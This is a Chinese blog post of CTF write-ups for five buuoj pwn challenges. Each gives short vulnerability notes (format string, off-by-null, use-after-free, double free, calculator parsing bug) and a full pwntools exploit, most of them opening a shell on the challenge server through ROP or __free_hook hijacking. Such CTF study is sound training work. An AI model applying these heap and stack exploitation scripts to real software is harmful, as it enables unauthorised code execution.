buuoj Pwn writeup 231-235

最新推荐文章于 2023-05-06 00:08:28 发布
最新推荐文章于 2023-05-06 00:08:28 发布
阅读量333 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119379396
版权

231 pwnable_calc

在这里插入图片描述似乎有点麻烦,一点一点来。

在这里插入图片描述刚开始是一个开始语。

calc
在这里插入图片描述bzero看着像个清零。

然后get_expr进去看看,应该是输入函数。
在这里插入图片描述显然是的。

第二个函数是一个init_pool。
这个函数显然就是在初始化那个v1.
v1初始化了之后用处应该是一会用来算算数用的。

然后下面是计算函数。
在这里插入图片描述
问题在哪?
由于检查跳出循环的if 语句被放在了最后面, 这就造成了输入非法表达式也会被解析而不会报错, 利用这个非法表达式可以造成任意地址写。

exp

from pwn import *
import struct

context(arch='i386', os='linux', log_level='debug')


p = process("./calc")

elf = ELF("./231")

popedx = 0x080701aa
popeax = 0x0805c34b
popebx = 0x080481d1
popecxebx = 0x080701d1
int80 = 0x08049a21

payload = "+360" 
p.sendlineafter("=== Welcome to SECPROG calculator ===", payload)

p.recvline()
mebp = int(p.recvline()) & 0xffffffff
print "init_mebp-> " + hex(mebp)

mebp = (mebp + 0x10) & 0xfffffff0
mebp -= 2**32
print "mebp-> " + hex(mebp)

rop = [0x080701d1, 0, mebp - 0x4, 0x080701aa, 0, 0x0805c34b, 0xb, 0x08049a21, u32('/bin'), u32('/sh\0')]
for i in range(10):
	payload = "+" + str(360 + i + 1)
	if rop[i] == 0:
		p.sendline(payload)
		stack = int(p.recvline()) & 0xffffffff
		if stack != 0:
			print "stack-> " + hex(stack)
			payload += "-" + str(stack)
			p.sendline(payload)
			p.recvline()
	else:
		p.sendline(payload)
		stack = int(p.recvline()) & 0xffffffff
		print "pppr -> " + hex(stack)
		if stack != 0:
			payload += "-" + str(stack)
			p.sendline(payload)
			p.recvline()
		if i != 2:
			payload = "+" + str(360 + i + 1) + "+" + str(rop[i])
		else:
			payload = "+" + str(360 + i + 1) + str(rop[i])
		p.sendline(payload)
		p.recvline()
#	if i == 9:
#		raw_input()

p.sendline("Give me shell!")
p.interactive()

exp直接拿了别的师傅的。写起来太麻烦了……

232 picoctf_2018_authenticate

在这里插入图片描述
在这里插入图片描述逻辑简单,就是一个格式化字符串漏洞,目的呢是把
bss段上的一个变量改一下。

在这里插入图片描述
在这里插入图片描述
偏移是11

exp

from pwn import*

context.log_level = "debug"

r = remote("node4.buuoj.cn", "27718")

bss = 0x804a04c

payload = fmtstr_payload(11, {bss:1})  
r.sendline(payload)


r.interactive()

233 x_nuca_2018_offbyone2

在这里插入图片描述
add
在这里插入图片描述
申请的大小要大于0x7f。

在这里插入图片描述确实跟题目一样,输入的地方有个off by null。

delete
在这里插入图片描述清空指针了。

show
在这里插入图片描述
正常show

虽然got表可读可写,但是因为开了pie,我们还是不去用unlink。
就正常申请chunk制造overlap就可以了。

from pwn import *

#context.log_level = "debug"

r = remote("node4.buuoj.cn", "26102")
#r = process("./233")
libc = ELF("./64/libc-2.27.so")
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")

def add(size,note):
    r.sendlineafter('>> ','1')
    r.sendlineafter('length: ',str(size))
    r.sendafter('note:',note)

def delete(idx):
    r.sendlineafter('>> ','2')
    r.sendlineafter('index: ',str(idx))

def show(idx):
    r.sendlineafter('>> ','3')
    r.sendlineafter('index: ',str(idx))

add(0x1f0, "aaa\n") #0
add(0xf8, "aaaa\n") #1
add(0x1f0, "aaa\n") #2
add(0xf8, "aaaa\n") #3

for i in range(7):
    add(0x1f0, "a\n")

for i in range(7):
    delete(4 + i)

delete(0)

delete(1)
add(0xf8, "a" * 0xf0 + p64(0x300)) #0
delete(2)
#虽然前面delete0会放到unsorted bin中,但是overlap之后就合成了一大个。

add(0x1f0, "aaa\n") 
for i in range(7):
    add(0x1f0, "aaa\n")
#1、2、4-9

show(0)
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
print "libc_base = " + hex(libc_base)

add(0x1f0, "aaa\n") #11
#gdb.attach(r)
delete(0)
delete(10)

add(0x1f0, p64(free_hook) + '\n') #0
add(0x1f0, "/bin/sh\x00\n") #10
add(0x1f0, p64(system_addr) + '\n') #11

delete(10)

r.interactive()

234 wdb_2018_1st_blind

在这里插入图片描述
add
在这里插入图片描述大小限定死了。

edit
在这里插入图片描述
free
在这里插入图片描述有uaf,但是只能free三次。

在这里插入图片描述还有个后门函数。刚开始我还没找着。

按照我们一般的思路,因为free受限,所以考虑攻击tcache头,但是又因为大小0x68定死了,就算攻击tcache头也没啥用,因为还是得不到libc基地址,那咋整?

我们攻击bss段上的stdout指针。
在这里插入图片描述

exp

#coding:utf8
from pwn import *

context.log_level = "debug"
 
r = remote("node4.buuoj.cn","25439")

backdoor = 0x4008e3
 
def add(index,content):
   r.sendlineafter('Choice:','1')
   r.sendlineafter('Index:',str(index))
   r.sendlineafter('Content:',content)
 
def edit(index,content):
   r.sendlineafter('Choice:','2')
   r.sendlineafter('Index:',str(index))
   r.sendlineafter('Content:',content)
 
def delete(index):
   r.sendlineafter('Choice:','3')
   r.sendlineafter('Index:',str(index))
 
fake_chunk_in_bss = 0x601FF5

add(0,'a'*0x60) #0
delete(0)
edit(0,p64(fake_chunk_in_bss))
add(1,'a'*0x60) #1
#伪造一个IO_FILE
payload = p64(fake_chunk_in_bss + 0xB)
payload += p64(0)
payload += p64(fake_chunk_in_bss + 0x10) #vtable
payload += '\x00'*0x3 + p64(fake_chunk_in_bss - 0x78) + p64(backdoor) + '\x00'*0x25 + p64(0x601FF0)
add(2,payload) #申请到bss上,篡改stdout指针,伪造IO_FILE,当调用printf时,会getshell
 
r.interactive()

235 ciscn_2019_n_2

在这里插入图片描述
在这里插入图片描述
create user
在这里插入图片描述最多三个chunk。

在这里插入图片描述结构大概长这样

delete
在这里插入图片描述
chunk被free之后将标志位改成了0.
但是明显有个double free。

edit
在这里插入图片描述正常edit,没看出啥问题。

print
在这里插入图片描述0x18中间那个原来是money。

addmoney
在这里插入图片描述还可以加钱。

gift
在这里插入图片描述可以泄露点地址,但是需要有钱。

总体来说就是利用double free。我们可以先把指针数组先申请出来,然后劫持got表就好了。

exp

from pwn import *

context.log_level = 'debug'

r = remote("node4.buuoj.cn","28122")

elf = ELF("./235")
libc = ELF("./64/libc-2.27.so")

def add(content, age):
	r.recvuntil("Your choice: ")
	r.sendline('1')
	r.recvuntil("name:")
	r.send(content)
	r.recvuntil("age:")
	r.sendline(str(age))

def delete(index):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("Index:")
	r.sendline(str(index))

def show(index):
	r.recvuntil(menu)
	r.sendline('4')
	r.recvuntil("Index:")
	r.sendline(str(index))

def edit(index, content, age):
	r.recvuntil(menu)
	r.sendline('3')
	r.recvuntil("Index:")
	r.sendline(str(index))
	r.recvuntil("name:")
	r.send(content)
	r.recvuntil("age:")
	r.sendline(str(age))

def add_money(index):
	r.recvuntil(menu)
	r.sendline('5')
	r.recvuntil("Index:")
	r.sendline(str(index))

def buy(index, addr, size):
	r.recvuntil(menu)
	r.sendline('6')
	r.recvuntil("Index:")
	r.sendline(str(index))
	r.recvuntil("input the address you want to leak:")
	r.sendline(hex(addr))
	r.recvuntil("input the size you want to leak:")
	r.sendline(str(size))
	r.recvuntil("data:[[[")
	addr = u64(r.recv(size).ljust(8, '\x00'))
	return addr


bss_addr = 0x602060
free_got = elf.got['free']


add('KMFL\n', 1)
delete(0)
delete(0)
add(p64(bss_addr), 10)
add(p64(bss_addr), 10)
add(p64(free_got), 10)
add_money(2)
show(0)
r.recvuntil('name: ')
libc.address = u64(r.recvn(6) + '\x00' * 2) - libc.symbols['free']
free_hook = libc.sym['__free_hook']
system = libc.sym['system']
bin_sh = libc.search('/bin/sh').next()


edit(2, p64(free_hook), bin_sh)
edit(0, p64(system), 10)
delete(1)

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 401
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3195
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF:【x_nuca_2018_offbyone2】(off by null)
weixin_51055545的博客
01-06 1250
buu里挑了一道heap的题,是一道off by null 的题,比较容易,经典一些 例行检查:
wdb_2018_1st_blind(劫持bss段上的stdout指针来执行任意函数)
seaaseesa的博客
06-10 1002
wdb_2018_1st_blind(劫持bss段上的stdout指针来执行任意函数) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,程序里没有show功能 有一个后门函数 Delete功能存在UAF,但是delete功能只能用3次,因此劫持_IO_2_1_stdout来泄露libc地址次数不够用。 由于got表也不可写,那么我们可以劫持bss段上的stdout指针,将其指向我们伪造的_IO_FILE结构体处,就可以调用backdoor函数了。 #coding:ut
PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop
QYbudong的博客
05-06 1498
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop。
攻防世界pwn新手区 exp
qq_40390383的博客
09-11 565
level0 from pwn import * r = remote("220.249.52.133", 57278) payload = 'A' * 0x80 + 'a' * 0x8 + p64(0x00400596) r.recvuntil("Hello, World\n") r.sendline(payload) r.interactive() CGfsb from pwn import * xl = remote('220.249.52.133',43908) pwnname_addr
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
广联达582驱动-全国版写锁
06-12
最新的广联达写锁,亲测非常好用。
解析c中stdout与stderr容易忽视的一些细节
09-05
本篇文章是对在c语言中stdout与stderr容易忽视的一些细节进行了详细的分析介绍,需要的朋友参考下
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 315
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2020
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
2021-09-07 BUUCTF-PWN 刷题记录
m0_56897090的博客
09-07 574
2021-09-07 roarctf_2019_easy_pwn 0x00 题目分析 堆题 整体功能 增加 删除 修改 输出 保护情况: root@ubuntu:~## pwn checksec roa* [*] '/root/roarctf_2019_easy_pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE:
PicoCTF_2018_buffer_overflow_3(本地固定canary的爆破)
seaaseesa的博客
05-01 839
PicoCTF_2018_buffer_overflow_3 用IDA分析一下程序,程序从一个固定文件里读取数据,作为canary的值。 由于文件内容不变,所以,我们可以直接爆破。 #coding:utf8 from pwn import * shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, passwor...
PicoCTF_2018_are_you_root(未初始化验证漏洞)
seaaseesa的博客
04-17 849
PicoCTF_2018_are_you_root 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。 Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符...
picoctf_2018_echooo
doudoudedi
09-23 522
发现是简单的32位格式化字符串但是并且flag存了栈上,直接泄漏就行了,但是内存是小端存储的,所以倒序输出即可 exp: from pwn import * #p=process('./PicoCTF_2018_echooo') p=remote('node3.buuoj.cn',26798) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) p.sendlineafter('> ',p
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值